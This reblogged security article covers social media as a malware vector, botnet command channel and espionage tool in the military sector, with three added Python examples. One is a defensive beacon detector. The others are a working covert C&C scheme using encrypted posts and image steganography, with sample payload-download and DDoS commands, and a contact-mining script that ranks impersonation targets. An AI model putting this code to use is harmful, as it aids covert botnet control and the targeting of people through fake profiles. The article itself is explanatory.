Reblogged from source with thanks: http://resources.infosecinstitute.com/social-media-use-in-the-military-sector/
Social Media use in the Military Sector
Malware authors are very interested in social media platforms, mainly because they can spread malicious code to a wide audience with low awareness of the principal cyber threats.
In a military context, social media could allow attackers to recruit large numbers of bots to conduct a successful offensive against critical targets (e.g. critical infrastructure).
Another advantage of exploiting social media platforms is the possibility of targeting groups of individuals in a selected community who share particular attitudes and habits, typically for cyber espionage purposes.
According to the IBM X-Force 2012 Mid-year Trend and Risk Report, social networks have been the dominant targets of email phishing for more than two years, and drive-by downloads are becoming the principal method of infection.
In the last couple of years, specially crafted malware has been spread through social media, enabling both large-scale attacks and APT attacks. Social network platforms have been used for bot recruiting and also for hiding the command and control infrastructure and the related traffic.
Malicious code that hits social media can be grouped into the following categories:
Social network account-stealing malware, which presents fake authentication forms to harvest credentials for cyber espionage purposes.
In many cases such a simple scheme is enough to gather account credentials and other personal information such as e-mail addresses and phone numbers.
Binary or scripting malware hosted on third-party web sites for the distribution of targeted malware, which plants a backdoor by exploiting vulnerabilities in browser plugins.
Both categories are very common and widely used by cyber criminals, but they can also be employed by state-sponsored groups to infect large numbers of machines, to build a botnet for a cyber-attack such as a DDoS, or to conduct an APT attack.
The most popular example of social malware that can be analyzed to understand the attack scheme on a social network is Koobface, a multi-platform malware that targeted users of the social networking websites Facebook, MySpace and Twitter.
Koobface propagates through popular social networking sites by spamming the platforms with large numbers of malicious URLs that point to compromised sites.
When a user clicks on one of those links, delivered for example through a platform message, he is redirected to a compromised site that exploits a vulnerability in his browser to download malware onto the victim's PC.
Figure 6 – Koobface schema
Social media to host C&C server
What about hiding malware control structure inside social networks?
Although IRC networks have surely been the most common malware command-and-control model, many botmasters are now beginning to use social networks such as Facebook and Twitter as C&C.
The choice pays off and makes botnet activity hard to detect: interactions with social networking sites are easily automated, and “malicious” traffic directed to social media platforms is hard to pick out of the large volume of legitimate traffic to the same domains.
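As an added example (not part of the original article), here is one way a defender can still pick that traffic out of the volume: a bot that polls a profile for commands does so on a timer, so its requests to the platform are evenly spaced, whereas a person's browsing is bursty. The script builds a constructed proxy log for three clients talking to the same host (the log format, the addresses and the thresholds are assumptions for the demo) and flags the (client, host) pairs whose request timing is numerous, long-lived and nearly constant.

```python
"""Beaconing check over constructed proxy log lines (added example, not from the
original article). The log format, addresses and thresholds are assumptions."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Assumed log format: "<ISO timestamp> <client ip> <method> <url> <status>".
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def build_sample_log():
    """Constructed proxy log (not real traffic): three clients talking to one host."""
    base = datetime(2012, 9, 1, 8, 0, 0)
    lines = []

    def emit(client, host, gaps):
        elapsed = 0
        for gap in gaps:
            elapsed += gap
            stamp = (base + timedelta(seconds=elapsed)).isoformat()
            lines.append(f"{stamp} {client} GET https://{host}/profile.php?id=100001234 200")

    # Bot: polls every ~5 minutes with a few seconds of jitter, for two hours.
    jitter = [0, 3, -2, 5, 1, -4, 2, 0, 6, -1, 3, -3, 1, 4, -2, 0, 2, -5, 1, 3, -1, 2, 0, 4]
    emit("10.0.0.5", "www.facebook.com", [0] + [300 + j for j in jitter])
    # Person: irregular visits spread over the same two hours.
    emit("10.0.0.7", "www.facebook.com",
         [0, 12, 340, 7, 901, 45, 1500, 3, 88, 620, 15, 2400, 9, 1100, 33, 5, 700])
    # Page load: twelve asset fetches one second apart, regular but far too short-lived.
    emit("10.0.0.9", "www.facebook.com", [0] + [1] * 11)
    return sorted(lines)


def detect_beacons(lines, min_requests=10, min_span=1800, max_cv=0.15):
    """Return (client, host, requests, mean_gap, cv) for pairs whose timing looks machine-driven.

    cv is the coefficient of variation (stdev / mean) of the inter-request gaps:
    near 0 for a timer, well above max_cv for a human. min_span rules out short
    bursts such as a page pulling a dozen assets in a row.
    """
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort on a huge log
        stamp, client, _method, url, _status = m.groups()
        host = urlsplit(url).hostname
        if host:
            seen[(client, host)].append(datetime.fromisoformat(stamp))
    flagged = []
    for (client, host), times in seen.items():
        times.sort()
        if len(times) < min_requests:
            continue
        if (times[-1] - times[0]).total_seconds() < min_span:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            flagged.append((client, host, len(times), round(mean, 1), round(cv, 3)))
    return flagged


if __name__ == "__main__":
    for hit in detect_beacons(build_sample_log()):
        print("possible beacon:", hit)
```

The thresholds are a starting point, not a verdict: a bot can add random sleep to blur its interval, and a legitimate client-side poller (a web mail tab refreshing itself) produces the same signature, so treat a hit as a lead for the analyst rather than a block decision.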
Attackers set up a network of fake profiles on a social network and use them to post a specific set of encrypted commands for the malware.
The infected machine polls the “botmaster” profile for new commands; a botnet whose C&C lives on a social network is extremely resilient, since a profile that gets closed is simply replaced by another, and it allows the malware to run for long periods of time.
The attackers have improved their control techniques over time.
Some malicious agents in fact do not limit themselves to interpreting text messages from the social network but also receive commands hidden inside a picture posted by a profile related to the botmaster.
Figure 7 – Example Botnet based on Social Networks
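The schema in Figure 7 as an added example (not the article's code and not taken from any real botnet): the botmaster posts encrypted and authenticated commands to a fake profile's timeline, as a base64 token inside an ordinary-looking message or hidden in the least significant bits of a posted image; the bot polls the timeline, tries every candidate token and acts only on those whose tag verifies under the shared key. The key, the posts and the synthetic image are assumptions, and the cipher is a SHA-256 counter-mode stand-in for whatever a real sample would use.

```python
"""Social-network C&C simulation (added example, not from the original article).

Key, posts and 'image' are constructed in memory; the cipher is a SHA-256
counter-mode stand-in; nothing touches a real network.
"""
import base64
import hashlib
import hmac
import os
import random
import re

SHARED_KEY = b"demo key shared by botmaster and bots"  # assumption for the demo
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{32,}={0,2}")  # shortest valid token is 32 chars


def _crypt(key, nonce, data):
    """Toy stream cipher (SHA-256 in counter mode, stand-in for a real one); XOR is its own inverse."""
    stream = b""
    for counter in range((len(data) + 31) // 32):
        stream += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
    return bytes(a ^ b for a, b in zip(data, stream))


def encode_command(command, key=SHARED_KEY):
    """Botmaster side: encrypt-then-MAC, returned as base64(nonce || ciphertext || tag)."""
    nonce = os.urandom(8)
    ciphertext = _crypt(key, nonce, command.encode())
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()[:16]
    return base64.urlsafe_b64encode(nonce + ciphertext + tag).decode()


def decode_command(token, key=SHARED_KEY):
    """Bot side: the command if the token's tag verifies under our key, else None."""
    try:
        raw = base64.urlsafe_b64decode(token)
    except ValueError:
        return None
    if len(raw) < 8 + 16:
        return None
    nonce, ciphertext, tag = raw[:8], raw[8:-16], raw[-16:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        return None  # an ordinary post, or a token meant for another botnet
    return _crypt(key, nonce, ciphertext).decode(errors="replace")


def embed_lsb(pixels, payload):
    """Hide payload in the least significant bit of each pixel byte, 16-bit length first."""
    data = len(payload).to_bytes(2, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(pixels):
    """Read back a payload written by embed_lsb; b'' if the image cannot hold one."""
    def read(start, count):
        bits = [pixels[start + i] & 1 for i in range(count * 8)]
        return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))

    if len(pixels) < 16:
        return b""
    length = int.from_bytes(read(0, 2), "big")
    if 16 + length * 8 > len(pixels):
        return b""  # not a stego image (or a damaged one)
    return read(16, length)


def poll_profile(posts, key=SHARED_KEY):
    """Scan a timeline (dicts with 'text' and optional 'image' bytes); return valid commands in order."""
    commands = []
    for post in posts:
        sources = [post.get("text", "")]
        if "image" in post:
            sources.append(extract_lsb(post["image"]).decode("ascii", errors="ignore"))
        for text in sources:
            for token in TOKEN_RE.findall(text):
                command = decode_command(token, key)
                if command is not None:
                    commands.append(command)
    return commands


def poll_demo_timeline():
    """Constructed timeline: two real commands among ordinary posts and look-alike noise."""
    rng = random.Random(1)
    cover = bytes(rng.randrange(256) for _ in range(4096))  # synthetic 'image', 4096 pixel bytes
    posts = [
        {"text": "Great weekend at the lake! #summer"},
        {"text": "check this out " + encode_command("update http://example.invalid/payload.bin")},
        {"text": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},  # long token, but the tag fails
        {"text": "new photo", "image": embed_lsb(cover, encode_command("ddos 192.0.2.10:80 300").encode())},
        {"text": "just an ordinary photo", "image": cover},
    ]
    return poll_profile(posts)
```

The authentication tag is what makes the channel workable on a busy timeline: the bot can try every post and silently ignore anything it did not originate, while someone reading the same timeline sees only base64 noise and a photo. The LSB variant depends on the image arriving bit-for-bit intact; any lossy re-encoding of the picture by the platform destroys the hidden bits, which is why the text variant is the more robust of the two.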
One of the principal military uses of social media is cyber espionage.
The most popular techniques include:
Identity replacement: impersonating an existing user to acquire information.
Identity spoofing: creating a fake profile that does not correspond to any existing person.
Malware-based attacks: using malicious code to compromise a victim's machine and steal sensitive information.
Sharing a link to a compromised website could allow an attacker to exploit a vulnerability in a user's browser and gain control of his PC.
Cyber espionage through social media (facts, statistics and technologies) is essentially based on data mining of the linked networks of contacts.
Social media can be useful for cyber espionage and cyber intelligence in the preparation stage of PSYOPS/CYBEROPS, for reconnaissance (intelligence), and for targeted groups (a set of persons, a political party, journalists, the employees of a targeted company, and so on).
Services such as Twitter are already commonly used for geopolitical analysis of so-called “protest activities” in different countries, a very useful military segment.
Applying data mining techniques to contacts and connections makes it possible to establish the relationships between different persons as part of a cyber intelligence operation.
It also helps to gather the private contacts of persons who publish them only to a very close group of people, because the other end of each relationship is often visible in the contacts' own public profiles.
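An added example (not from the original article) of the contact mining just described: from constructed friend lists it rebuilds the graph, reconstructs a target's contacts without reading the target's own (private) list, ranks those contacts by how many connections they share with the target, and enumerates the friends-of-friends audience that a friends-only post reaches. All names and relationships are invented, as is the assumption that every list except the target's is public.

```python
"""Contact-graph mining over constructed friend lists (added example, not from the
original article). Names, relationships and the public/private split are invented."""
from collections import defaultdict

# Constructed friend lists: who each account lists as a contact.
FRIEND_LISTS = {
    "target": ["alice", "bob", "carol", "dave"],   # private in the demo, never read
    "alice": ["target", "bob", "carol", "erin"],
    "bob": ["target", "alice", "carol"],
    "carol": ["target", "alice", "bob", "frank"],
    "dave": ["target", "grace"],
    "erin": ["alice"],
    "frank": ["carol"],
    "grace": ["dave"],
}


def build_graph(friend_lists):
    """Undirected adjacency sets: a link listed on either side counts for both."""
    graph = defaultdict(set)
    for person, friends in friend_lists.items():
        for friend in friends:
            graph[person].add(friend)
            graph[friend].add(person)
    return graph


def infer_contacts(friend_lists, target):
    """Reconstruct target's contacts without target's own list: every public list
    that names the target reveals one end of a relationship the target kept private."""
    return {person for person, friends in friend_lists.items()
            if person != target and target in friends}


def rank_contacts(graph, target):
    """Target's contacts ordered by mutual connections (ties broken by name). The top
    entries are the accounts a fake 'friend of a friend' is most likely to be accepted by."""
    scores = [(contact, len(graph[contact] & graph[target])) for contact in graph[target]]
    return sorted(scores, key=lambda item: (-item[1], item[0]))


def within_hops(graph, start, hops):
    """Everyone reachable in at most `hops` steps: the audience of a friends-of-friends post."""
    frontier, seen = {start}, {start}
    for _ in range(hops):
        frontier = {n for node in frontier for n in graph[node]} - seen
        seen |= frontier
    return seen - {start}


def mine_target(target="target"):
    """Run the three analyses using only the lists that are public (target's excluded)."""
    public = {person: friends for person, friends in FRIEND_LISTS.items() if person != target}
    graph = build_graph(public)
    return {
        "inferred_contacts": sorted(infer_contacts(public, target)),
        "ranked_contacts": rank_contacts(graph, target),
        "two_hop_audience": sorted(within_hops(graph, target, 2)),
    }
```

The ranking is the part an impersonator cares about: a fake profile that already has several mutual connections with its target is far more likely to have its request accepted, which is the pattern behind the NATO case below.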
The following are two of the most interesting cases of cyber espionage conducted using social media platforms:
NATO’S most senior commander was at the center of a major security alert when a series of his colleagues fell for a fake Facebook account opened in his name – apparently by Chinese spies. (The Telegraph)
In May 2012, a few days before the second round of the presidential election won by Hollande, the President's office was infected by the Flame malware.
The attack against the President's office was a spear-phishing campaign that used the popular social network Facebook to spread the malware.
The attackers shared a link to an infected website that was a replica of the Elysee's intranet, and used it both to infect the machines and to gather user credentials.
All the machines that were part of the presidential network, including those of a number of Sarkozy's closest collaborators, were infected by the Flame agent.
Figure 8 – Attack on the President's office in May 2012
Social media platforms have assumed a fundamental role in our society.
Every day, billions of people share information, documents and any kind of content through these platforms.
It is natural that they have become an object of interest for cyber criminals and intelligence agencies.
Undoubtedly, social media is of strategic importance for the military sector, as it offers a mine of information that can be analyzed along different axes, providing efficient and reliable instruments for the study of realities of interest.
Both defense and offense can take advantage of the introduction of social media.
Social media can in fact be used as a powerful tool for information gathering and cyber espionage, and also as an active component of a botnet infrastructure.
Though social media is also an asset to be protected from attacks, its military use inevitably widens the attack surface.
Quite differently from other domains, the military has to deal with an area without a perimeter, which is difficult to protect.
Rapid technological evolution makes surveillance systems obsolete in a short time.
A greater effort is needed to establish early warning and security intelligence systems that identify cyber threats, but other improvements must come first.
The military needs to open up to social media, but it has to do so consciously.
Military personnel and their families must be instructed on how to manage their exposure on social platforms.
Social media platforms are powerful resources that can carry an incredible number of threats, so it is best never to let your guard down.